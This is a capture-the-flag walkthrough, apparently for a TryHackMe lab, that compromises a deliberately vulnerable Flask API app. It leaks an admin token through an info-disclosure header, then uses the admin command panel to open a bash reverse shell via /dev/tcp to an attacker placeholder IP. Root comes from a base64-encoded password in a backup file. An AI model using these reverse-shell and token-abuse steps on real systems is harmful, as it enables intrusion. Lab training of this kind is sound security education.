Vulnerable API App
Target Details
Target IP: 10.10.149.135
Service Discovery
Scan Open ports using nmap
$ sudo nmap -sS -sV -sC -Pn -A -oN nmap.txt 10.10.149.135 Nmap scan report for 10.10.149.135 Host is up (0.45s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 86:65:28:5a:90:b3:1f:8e:9c:0b:62:3a:71:4b:97:37 (RSA) | 256 87:37:9b:9d:fc:c4:dd:bc:21:0c:d9:a2:ab:96:90:be (ECDSA) |_ 256 a2:fd:4a:10:db:5b:ce:3d:c2:2c:c0:0c:8f:be:6c:41 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Welcome to nginx! |_http-server-header: nginx/1.18.0 (Ubuntu) 5000/tcp open upnp? | fingerprint-strings: | GenericLines: | HTTP/1.1 400 Bad Request ... ... Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 143/tcp) HOP RTT ADDRESS 1 354.40 ms 10.2.0.1 2 ... 3 4 447.88 ms 10.10.149.135 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Services Found:
SSH
22
OpenSSH 8.2p1
nginx HTTP
80
/1.18.0
Web Service
5000
Unknown
Answer the Task questions
Content Discovery
Visit the web application in browser
Common endpoints are /api or api.domain.com,
/api worked!
We can find other endpoints by manually by crawling through the web application with burpsuite proxy running
On inspecting the html, the admin has left a message in webpage comment for the hacker!
<!-- This is a normal login page, I've always been smarter than you, I've only created sign up action to `users` using API! If you want access, Hack the way in by finding endpoint and signing up or find flaw in the endpoint! - vuln admin -->
from comment we can make conclusion that, we cannot directly sign up from the login page, we need to find api endpoint to sign up. admin has also provided hint to the endpoint for users sign up
On visiting
/api/users
endpoint, we get json response, providing information about other users!!{ "users": [ { "userid": 1, "first_name": "Martin", "last_name": "Rodriguez", "admin": false }, { "userid": 2, "first_name": "Kristen", "last_name": "Martin", "admin": false }, .... { "userid": 27, "first_name": "Derek", "last_name": "Washington", "admin": true } ] }
We got user details names, user Id and their role while using the application
In most of the cases, endpoint supports various http methods, let's verify it using
OPTIONS
method. Let's visit the same users enpoint and send the request to repeater this time, and change HTTP method fromGET
toPOST
GET /api/users HTTP/1.1 # change to OPTIONS /api/users HTTP/1.1
On visiting
dmdhrumilmistry
GitHub Profile repos, Vulnerable-API-App app.py file, we can retrieve all the endpoints from the file. The useful ones for now are listed below.Endpoints Discovered using burpsuite
/api/users/
DELETE, HEAD, OPTIONS, GET
/api/users
POST, OPTIONS, HEAD, GET
Exploit Endpoints
from
/api/user/<userid:int>
endpoint we can get user details, from/api/users
endpoint we can retrieve admin user id and try to get their account details. For my case admin id is27
.admin id will vary
Send Burp Request to
/api/user/27
, we'll receive json response as{ "admin": true, "first_name": "Derek", "last_name": "Washington", "userid": 27 }
Using first question hint, we know that we need to send
Hide-Info
header in the HTTP request.Burp Request
GET /api/user/27 HTTP/1.1 Hide-Info: 0
Burp Json Response
{ "admin": true, "email": "admin@vuln-api-app.com", "first_name": "Derek", "last_name": "Washington", "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY1NzcwODY4OSwianRpIjoiYjBhNzdmODgtZjcyMS00ZjhkLTgyOGUtYWRlNzIwZjI3ODcwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluQHZ1bG4tYXBpLWFwcC5jb20iLCJuYmYiOjE2NTc3MDg2ODl9.94MZ1fRrRrIdt_FFnLQdjGMWHbvA5_cSnwYfiaVl0Jw", "userid": 27 }
Now we've received token
We can add token in BurpSuite every request using Custom Header Extension, Refer docs for installation and usage, then add authorization token to extension.
Now, Add
http://10.10.149.135:5000
, and capture in scope requests only.configure Custom Header extension to add header while using proxy using
Project Options
Sessions
From Session Handling rules click on add button
provide description
Click on Add button from Rule Actions
Choose
Invoke Burp Extension
Set extension handler to
Add Custom Header
Click on OK
From Scope tab, click on Proxy checkbox to add headers while using proxy. Also set URL scope to set Suite Scope
Click on OK
Visit HomePage
http://10.10.149.135:5000
Get Target Machine Shell
Visit HomePage, with login admin auth token
From HomePage, visit Admin Controls tab, from where we can run bash commands
Using GTFObins Bash Reverse Shell get access to reverse shell
Start Netcat on attacker's machine
nc -nlvp 4444
Enter below command in command input field
bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'
On Execution of command, we get a reverse shell on the attacker machine
$ nc -nlvp 4444 listening on [any] 4444 ... connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.226.214] 33472 bash: cannot set terminal process group (610): Inappropriate ioctl for device bash: no job control in this shell vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$
Get User Flag
Read User Flag
vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$ cat $HOME/user.txt THM{REDACTED}
Privilege Escalation
Checking if
vulnadmin
has sudo permissionsvulnadmin@vulnapiapp:~$ groups sudo adm cdrom dip plugdev lxd
vulnadmin
has sudo permission, but first we need to find its password to run sudo commandOn Listing Files in
vulnadmin
home directory, we find abackup.txt
filevulnadmin@vulnapiapp:~$ ls -l total 12 -rw-rw-r-- 1 vulnadmin vulnadmin 45 Jul 12 14:58 backup.txt drwxrwxr-x 3 vulnadmin vulnadmin 4096 Jul 12 11:27 deployment -rw-rw-r-- 1 vulnadmin vulnadmin 30 Jul 12 13:21 user.txt
On Reading file, it seems to be encoded in base64 format
Decode backup.txt file
vulnadmin@vulnapiapp:~$ cat backup.txt | base64 -d {REDACTED}
It's password for
vulnadmin
accountTo run sudo command we need to spawn terminal first, since the deployed application is running flask which is a python framework, python must be installed which can be verified using
vulnadmin@vulnapiapp:~$ python3 --version Python 3.8.10
Get Interactive Shell
vulnadmin@vulnapiapp:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
List commands which can be run as with root privileges by
vulnadmin
vulnadmin@vulnapiapp:~$ sudo su [sudo] password for vulnadmin: {REDACTED} root@vulnapiapp:/home/vulnadmin/#
Get Root Flag
root@vulnapiapp:~# cat /root/root.txt cat /root/root.txt THM{REDACTED}
We've successfully Rooted the machine!!
Last updated
Was this helpful?